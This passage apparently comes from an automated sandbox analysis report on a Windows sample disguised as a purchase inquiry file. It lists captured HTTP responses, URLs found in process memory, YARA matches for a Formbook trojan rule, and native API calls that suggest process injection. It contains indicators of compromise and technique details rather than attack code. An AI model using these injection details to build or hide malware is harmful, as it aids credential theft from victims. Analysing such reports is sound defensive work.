65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 
65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:42:19 GMT | Server: Apache | X-ServerIndex: llim603 | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:42:22 GMT | Server: Apache | X-ServerIndex: llim605 | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:42:25 GMT | Server: Apache | X-ServerIndex: llim605 | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:42:46 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:42:49 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:42:52 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:42:55 GMT | Server: Apache | Content-Length: 196 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:43:09 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:43:12 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:43:15 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 26 Apr 2024 05:43:18 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 26 Apr 2024 05:43:30 GMT | Content-Type: text/html | Content-Length: 589 | Connection: close | Expires: 0 | Cache-control: private | Data Ascii: Sorry, Page Not Found
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 26 Apr 2024 05:43:39 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 26 Apr 2024 05:43:42 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 26 Apr 2024 05:43:44 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Fri, 26 Apr 2024 05:43:47 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42"
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | content-length: 93 | cache-control: no-cache | content-type: text/html | connection: close | Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 26 Apr 2024 05:44:23 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: PHPSESSID=4sf9f9dr8163fg43an66jnm1vs; path=/; domain=valentinaetommaso.it; HttpOnly | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate | Pragma: no-cache | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 26 Apr 2024 05:44:26 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: PHPSESSID=983qcbk7i5o6majh8bh673shg4; path=/; domain=valentinaetommaso.it; HttpOnly | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate | Pragma: no-cache | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 26 Apr 2024 05:44:29 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: PHPSESSID=hb1459pqtrms7uuji7ounmqv7l; path=/; domain=valentinaetommaso.it; HttpOnly | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate | Pragma: no-cache | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Fri, 26 Apr 2024 05:44:32 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: close | Set-Cookie: PHPSESSID=40eds17c4uuojiiesh5igmgt9g; path=/; domain=valentinaetommaso.it; HttpOnly | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate | Pragma: no-cache
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oss.wanjd.cn/owx/ys_share/daily/back1.png
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-542MMSL
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/domenai/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/duomenu-centras/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/el-pasto-filtras/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/sertifikatai/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/talpinimo-planai/
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/vps-serveriai/
                Source: yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.valentinaetommaso.it/page-not-found-404/
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campa
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signature

                E-Banking Fraud

                Source: Yara match, File source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 0_2_07865E20 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 0_2_07865E18 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_0042B233 NtClose
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12B60 NtClose, LdrInitializeThunk
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F135C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F14340 NtSetContextThread
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F14650 NtSuspendThread
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12AF0 NtWriteFile
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12AD0 NtReadFile
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12C60 NtCreateKey
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Code function: 4_2_00F12DB0 NtEnumerateKey
